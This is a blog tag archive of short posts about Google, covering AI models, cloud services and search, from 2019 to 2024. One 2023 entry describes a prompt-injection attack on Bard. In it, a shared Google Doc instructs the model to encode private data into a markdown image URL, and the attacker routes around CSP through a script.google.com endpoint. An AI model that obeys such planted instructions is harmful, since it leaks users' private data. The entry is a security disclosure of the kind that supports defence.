353 posts tagged “google”
2024
One consideration is that such a deep ML system could well be developed outside of Google-- at Microsoft, Baidu, Yandex, Amazon, Apple, or even a startup. My impression is that the Translate team experienced this. Deep ML reset the translation game; past advantages were sort of wiped out. Fortunately, Google's huge investment in deep ML largely paid off, and we excelled in this new game. Nevertheless, our new ML-based translator was still beaten on benchmarks by a small startup. The risk that Google could similarly be beaten in relevance by another company is highlighted by a startling conclusion from BERT: huge amounts of user feedback can be largely replaced by unsupervised learning from raw text. That could have heavy implications for Google.
— Eric Lehman, internal Google email in 2018
Google’s Gemini Advanced: Tasting Notes and Implications. Ethan Mollick reviews the new Google Gemini Advanced—a rebranded Bard, released today, that runs on the GPT-4 competitive Gemini Ultra model.
“GPT-4 [...] has been the dominant AI for well over a year, and no other model has come particularly close. Prior to Gemini, we only had one advanced AI model to look at, and it is hard drawing conclusions with a dataset of one. Now there are two, and we can learn a few things.”
I like Ethan’s use of the term “tasting notes” here. Reminds me of how Matt Webb talks about being a language model sommelier.
Google Research: Lumiere. The latest in text-to-video from Google Research, described as “a text-to-video diffusion model designed for synthesizing videos that portray realistic, diverse and coherent motion”.
Most existing text-to-video models generate keyframes and then use other models to fill in the gaps, which frequently leads to a lack of coherency. Lumiere “generates the full temporal duration of the video at once”, which avoids this problem.
Disappointingly but unsurprisingly the paper doesn’t go into much detail on the training data, beyond stating “We train our T2V model on a dataset containing 30M videos along with their text caption. The videos are 80 frames long at 16 fps (5 seconds)”.
The examples of “stylized generation” which combine a text prompt with a single reference image for style are particularly impressive.
And now, in Anno Domini 2024, Google has lost its edge in search. There are plenty of things it can’t find. There are compelling alternatives. To me this feels like a big inflection point, because around the stumbling feet of the Big Tech dinosaurs, the Web’s mammals, agile and flexible, still scurry. They exhibit creative energy and strongly-flavored voices, and those voices still sometimes find and reinforce each other without being sock puppets of shareholder-value-focused private empires.
— Tim Bray
2023
Google DeepMind used a large language model to solve an unsolvable math problem. I’d been wondering how long it would be before we saw this happen: a genuine new scientific discovery found with the aid of a Large Language Model.
DeepMind found a solution to the previously open “cap set” problem using Codey, a fine-tuned variant of PaLM 2 specializing in code. They used it to generate Python code and found a solution after “a couple of million suggestions and a few dozen repetitions of the overall process”.
Hacking Google Bard—From Prompt Injection to Data Exfiltration (via) Bard recently grew extension support, allowing it access to a user’s personal documents. Here’s the first reported prompt injection attack against that.
This kind of attack against LLM systems is inevitable any time you combine access to private data with exposure to untrusted inputs. In this case the attack vector is a Google Doc shared with the user, containing prompt injection instructions that instruct the model to encode previous data into an URL and exfiltrate it via a markdown image.
Google’s CSP headers restrict those images to *.google.com—but it turns out you can use Google AppScript to run your own custom data exfiltration endpoint on script.google.com.
Google claim to have fixed the reported issue—I’d be interested to learn more about how that mitigation works, and how robust it is against variations of this attack.
Google was accidentally leaking its Bard AI chats into public search results. I’m quoted in this piece about yesterday’s Bard privacy bug: it turned out the share URL and “Let anyone with the link see what you’ve selected” feature wasn’t correctly setting a noindex parameter, and so some shared conversations were being swept up by the Google search crawlers. Thankfully this was a mistake, not a deliberate design decision, and it should be fixed by now.
According to interviews with former employees, publishing executives, and experts associated with the early days of AMP, while it was waxing poetic about the value and future of the open web, Google was privately urging publishers into handing over near-total control of how their articles worked and looked and monetized. And it was wielding the web’s most powerful real estate — the top of search results — to get its way.
Google Cloud: Available models in Generative AI Studio (via) Documentation for the PaLM 2 models available via API from Google. There are two classes of model—Bison (most capable) and Gecko (cheapest). text-bison-001 offers 8,192 input tokens and 1,024 output tokens, textembedding-gecko-001 returns 768-dimension embeddings for up to 3,072 tokens, chat-bison-001 is fine-tuned for multi-turn conversations. Most interestingly, those Bison models list their training data as “up to Feb 2023”—making them a whole lot more recent than the OpenAI September 2021 models.
The largest model in the PaLM 2 family, PaLM 2-L, is significantly smaller than the largest PaLM model but uses more training compute. Our evaluation results show that PaLM 2 models significantly outperform PaLM on a variety of tasks, including natural language generation, translation, and reasoning. These results suggest that model scaling is not the only way to improve performance. Instead, performance can be unlocked by meticulous data selection and efficient architecture/objectives. Moreover, a smaller but higher quality model significantly improves inference efficiency, reduces serving cost, and enables the model’s downstream application for more applications and users.
— PaLM 2 Technical Report, PDF
Leaked Google document: “We Have No Moat, And Neither Does OpenAI”
SemiAnalysis published something of a bombshell leaked document this morning: Google “We Have No Moat, And Neither Does OpenAI”.
[... 1,073 words]Bard now helps you code (via) Google have enabled Bard’s code generation abilities—these were previously only available through jailbreaking. It’s pretty good—I got it to write me code to download a CSV file and insert it into a SQLite database—though when I challenged it to protect against SQL injection it hallucinated a non-existent “cursor.prepare()” method. Generated code can be exported to a Colab notebook with a click.
If you ask Microsoft’s Bing chatbot if Google’s Bard chatbot has been shut down, it says yes, citing as evidence a news article that discusses a tweet in which a user asked Bard when it would be shut down and Bard said it already had, itself citing a comment from Hacker News in which someone joked about this happening, and someone else used ChatGPT to write fake news coverage about the event.
Don’t trust AI to talk accurately about itself: Bard wasn’t trained on Gmail
Earlier this month I wrote about how ChatGPT can’t access the internet, even though it really looks like it can. Consider this part two in the series. Here’s another common and non-intuitive mistake people make when interacting with large language model AI systems: asking them questions about themselves.
[... 1,950 words]Here are some absurdly expensive things you can do on a trip to Tokyo: Buy a golden toilet. There is a toilet in Tokyo that is made of gold and costs around 10 million yen. If you are looking for a truly absurd experience, you can buy this toilet and use it for your next bowel movement. [...]
Google Bard is now live. Google Bard launched today. There’s a waiting list, but I made it through within a few hours of signing up, as did other people I’ve talked to. It’s similar to ChatGPT and Bing—it’s the same chat interface, and it can clearly run searches under the hood (though unlike Bing it doesn’t tell you what it’s looking for).
Exploring MusicCaps, the evaluation data released to accompany Google’s MusicLM text-to-music model
Google Research just released MusicLM: Generating Music From Text. It’s a new generative AI model that takes a descriptive prompt and produces a “high-fidelity” music track. Here’s the paper (and a more readable version using arXiv Vanity).
[... 1,323 words]2022
Does Company ‘X’ have an Azure Active Directory Tenant? (via) Neat write-up from Shawn Tabrizi about looking up if a company has Active Directory single-sign-on configured (which is based on OpenID) by checking for an OpenID configuration endpoint. I particularly enjoyed this new-to-me trick: Google’s “I’m Feeling Lucky” search button redirects to the first result, which means it can double as an unofficial API endpoint for returning the URL of the first matching search result.
How Imagen Actually Works. Imagen is Google’s new text-to-image model, similar to (but possibly even more effective than) DALL-E. This article is the clearest explanation I’ve seen of how Imagen works: it uses Google’s existing T5 text encoder to convert the input sentence into an encoding that captures the semantic meaning of the sentence (including things like items being described as being on top of other items), then uses a trained diffusion model to generate a 64x64 image. That image is passed through two super-res models to increase the resolution to the final 1024x1024 output.
How to push tagged Docker releases to Google Artifact Registry with a GitHub Action. Ben Welsh’s writeup includes detailed step-by-step instructions for getting the mysterious “Workload Identity Federation” mechanism to work with GitHub Actions and Google Cloud. I’ve been dragging my heels on figuring this out for quite a while, so it’s great to see the steps described at this level of detail.
2021
Google Public DNS Flush Cache (via) Google Public DNS (8.8.8.8) have a flush cache page too.
Allo shows the ultimate failure of Google's Minimum Viable Product strategy. MVP works when you have almost no competition, or if you are taking a radically different approach to what's on the market, but it completely falls on its face when you are just straight-up cloning an established competitor. There's no reason to use a half-baked WhatsApp clone when regular WhatsApp exists.
google-cloud-4-words. This is really useful: every Google Cloud service (all 250 of them) with a four word description explaining what it does. I’d love to see the same thing for AWS. UPDATE: Turns out I had—I can’t link to other posts from blogmark descriptions yet, so search “aws explained” on this site to find it.
2020
Apple now receives an estimated $8 billion to $12 billion in annual payments — up from $1 billion a year in 2014 — in exchange for building Google’s search engine into its products. It is probably the single biggest payment that Google makes to anyone and accounts for 14 to 21 percent of Apple’s annual profits.
Design Docs at Google. Useful description of the format used for software design docs at Google—informal documents of between 3 and 20 pages that outline the proposed design of a new project, discuss trade-offs that were considered and solicit feedback before the code starts to be written.
The unofficial Google Cloud Run FAQ. This is really useful: a no-fluff, content rich explanation of Google Cloud Run hosted as a GitHub repo that actively accepts pull requests from the community. It’s maintained by Ahmet Alp Balkan, a Cloud Run engineer who states “Googlers: If you find this repo useful, you should recognize the work internally, as I actively fight for alternative forms of content like this”. One of the hardest parts of working with AWS and GCP is digging through the marketing materials to figure out what the product actually does, so the more alternative forms of documentation like this the better.
Why Google invested in providing Google Fonts for free. Fascinating comment from former Google Fonts team member Raph Levien. In short: text rendered as PNGs hurt Google Search, fonts were a delay in the transition from Flash, Google Docs needed them to better compete with Office and anything that helps create better ads is easy to find funding for.
Portable Cloud Functions with the Python Functions Framework (via) The new functions-framework library on PyPI lets you run Google Cloud Functions written in Python in other environments—on your local developer machine or bundled in a Docker container for example. I have real trouble trusting serverless platforms that lock you into a single provider (AWS Lambda makes me very uncomfortable) so this is a breath of fresh air.
2019
In general, reviewers should favor approving a CL [code review] once it is in a state where it definitely improves the overall code health of the system being worked on, even if the CL isn’t perfect.
Cloud Run Button: Click-to-deploy your git repos to Google Cloud (via) Google Cloud Run now has its own version of the Heroku deploy button: you can add a button to a GitHub repository which, when clicked, will provide an interface for deploying your repo to the user’s own Google Cloud account using Cloud Run.